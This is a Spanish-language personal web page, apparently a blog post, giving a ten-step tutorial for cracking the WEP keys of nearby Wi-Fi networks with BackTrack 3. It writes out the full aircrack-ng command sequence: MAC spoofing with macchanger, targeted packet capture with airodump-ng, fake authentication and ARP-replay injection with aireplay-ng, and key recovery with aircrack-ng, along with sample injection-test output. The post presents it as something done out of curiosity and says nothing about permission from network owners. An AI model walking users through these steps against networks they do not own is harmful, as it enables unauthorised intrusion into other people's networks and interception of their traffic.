Crackenado clave Wep con Bactrack en solo 10 pasos 


 Todos conocemos distros Live-Cd de Linux como WifiSlax, Bactrack, etc. Para crackear las contraseñas Wep de señales Wi-fi..... A mi en lo personal me gusta Backtrack y es con el cuál he podido crackear dichas claves Wep, esto solo lo hecho por curiosidad (bendita sea la curiosidad en el hombre y bendita sea la imaginación, como dijo A. Einstein " La imaginación es más importante que el conocimiento, pues el conocimiento es limitado y la imaginación no tiene límites")

 A continuación los 10 pasos para crackear con Backtrack3: sólo los escribire, tengo un poco de dedicia y no subire imagenes... ;)


Abrimos la Shell y :

1.- # airmon-ng                -----> para ver nuestra interfaz de red

2.-# airmon-ng stop eth0  ----> detenemos nuestra interfaz de red

3.- # ifconfig eth0 down      ----> mi interfaz de red  es eth0 y en el tuyo puede ser wlan0, etc.

4.- # macchanger –m 00:11:22:33:44:55 eth0  ----> cambiamos nuestra mac ;)

5.- # airmon-ng start eth0  ---> iniciamos nuevamente nuestra interfaz de red.

# airodump-ng eth0      ----> para ver redes wi-fi a nuestro alcance

Apretamos para detener push ctrl+c

    *
      Copiamos el BSSID de la red que queramos crackear

# airodump-ng -c (numero del canal) -w crack –bssid (bssid) eth0    ---> crack es el nombre del archivo donde guardara las capturas del tráfico y                                                                                                                obviamente puede ser cualquier nombre :)
- mientras pwr sea mas grande, mejor       

- el #Data debe ser alrededor de 10mil, para forzarlo:

#aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) eth0   ---> si al realizar este paso, se asocia bien, pero al momento de injectar tienes un mensaje como este ; Notice: got a deauth/disassoc packet. Is the source MAC associated ?  --> debes cambiar el comando anterior por este:
aireplay-ng -1 6000 -o 1 -q 10 -e (essid) -a (bssid) -h 00:11:22:33:44:55 eth0

#aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 eth0

Ahora esperamos a que nuestro #Data sobrepase los 30mil y al hacerlo ejecutar…

# aircrack-ng -n 64 -b (bssid) crack-01.cap    ---> es -n 64 si la clave a crackear es de 64 bits, si fuese de 128 logicamente seria -n 128, etc etc.

Nota: El cap file esta en la carpeta home, y su nombre sera crack-01.cap si es el primer intento , si es el segundo sera crack-02.cap y asi sucesivamente....

*****  ---- Para saber en que AP nos funcionara la injección solo debemos ejecutar el siguiente comando:

aireplay-ng -9 eth0

16:29:41  wlan0 channel: 9
 16:29:41  Trying broadcast probe requests...
 16:29:41  Injection is working!
 16:29:42  Found 5 APs
 
16:29:42  Trying directed probe requests...
16:29:48  00:14:BF:A8:65:AC - channel: 9 - 'title'
16:29:54  0/30: 0%

16:29:54  00:14:6C:7E:40:80 - channel: 9 - 'teddy'
16:29:55 Ping (min/avg/max): 2.763ms/4.190ms/8.159ms
16:29:55 27/30: 90% --> como puedes ver en este AP, tienes un 90% de seguridad que trabajara la injección..

 P.D: Esto lo encontre navegando por la red y no recuerdo la página, pero esta modificado por mí, para su mejor entendimiento ya que había pasos que no se comprendian muy bien... hay mucho más por la red pero hay unos muy liosos, estes es la manera más simple a mi parecer  y suerte..... ;)
Make a Free Website with Yola.